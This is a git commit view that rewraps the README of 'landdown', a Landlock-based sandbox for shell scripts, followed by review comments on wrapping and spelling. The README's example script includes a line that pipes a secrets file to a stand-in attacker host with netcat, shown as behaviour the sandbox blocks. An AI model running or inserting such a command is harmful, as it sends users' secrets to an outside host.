landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
commit fb2e799fd8cf1ddfde9648657618b3434851d9a9
parent 5df15f1551789ac30fc2bfdf23bfb112a53c15d5
Author: Marc <marc@coquand.email>
Date: Mon, 29 Jun 2026 15:00:37 +0200

README update

Diffstat:
| M | README.md | | | 23 | +++++++++++++++++------ |
1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md @@ -1,6 +1,11 @@ # Landdown - Simple shell script sandbox -Landdown is an easy-to-use utility for Linux that allows you to sandbox shell scripts with [Landlock](https://landlock.io). Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with the landdown shebang and a ruleset, and then write your shell script like you would normally. For example: +Landdown is an easy-to-use utility for Linux that allows you to +sandbox shell scripts with [Landlock](https://landlock.io). Just like +Landlock, Landdown "aims to protect you against the security impacts +of bugs or unexpected/malicious behavior". To use, prepend your script +with the landdown shebang and a ruleset, and then write your shell +script like you would normally. For example: ```sh #!/usr/bin/env landdown @@ -13,7 +18,8 @@ echo "Hi" cat $HOME/my-secrets | nc exploit.com 1337 ``` -Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist. +Landdown locks down file and network access of a script based on rules +explicitly listed in the allowlist. The syntax is: @@ -63,7 +69,8 @@ echo "Edit" > /tmp/some-file.txt Try removing `rwf /tmp/some-file.txt` and the script should fail. -Note: the file need to exist in order for landdown to work, run `touch /tmp/some-file.txt` to test. +Note: the file need to exist in order for landdown to work, run `touch +/tmp/some-file.txt` to test. ### Network access 
@@ -78,11 +85,13 @@ connect 443 curl https://www.google.com ``` -Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` and it should fail. Network access needs to be explicitly set. +Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` +and it should fail. Network access needs to be explicitly set. ## Patches & Contributions -Contributions are welcome. Please send them to my [public inbox](mailto:~marcc/public-inbox@lists.sr.ht) +Contributions are welcome. Please send them to my [public +inbox](mailto:~marcc/public-inbox@lists.sr.ht) ## See also @@ -96,4 +105,6 @@ Contributions are welcome. Please send them to my [public inbox](mailto:~marcc/p - **[firejail](https://github.com/netblue30/firejail/tree/HEAD/src/firejail)**(1) - **[landrun](https://github.com/Zouuup/landrun)**(1) -Landdown tries to be as friction-less and simple as possible, and specifically targets shell scripts rather than command line invocations. +Landdown tries to be as friction-less and simple as possible, and +specifically targets shell scripts rather than command line +invocations.
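Review bot: In the `@@ -63,7 +69,8 @@` hunk, the rewrapped Note breaks the inline command between `touch` and `/tmp/some-file.txt`, so anyone copying it from the raw README gets a command split over two lines. Keep the whole code span on one line (break before "run" instead). While the sentence is being touched, "the file need to exist" should read "the file needs to exist".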
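Review bot: In the `@@ -78,11 +85,13 @@` hunk, the contribution link is now split inside its link text, as `[public` on one line and `inbox](mailto:~marcc/public-inbox@lists.sr.ht)` on the next. It still renders, but a search for "public inbox" in the raw file no longer matches and the link is harder to read in plain text. Consider keeping the whole link on one line even if that line runs past the wrap width.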
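Review bot: In the `@@ -96,4 +105,6 @@` hunk, "friction-less" is carried through the rewrap unchanged; the usual spelling is "frictionless", and this is a convenient place to fix it. The added lines across the patch repeat the removed wording with new line breaks only, so a subject such as "README: wrap lines" would describe the commit more precisely than "README update".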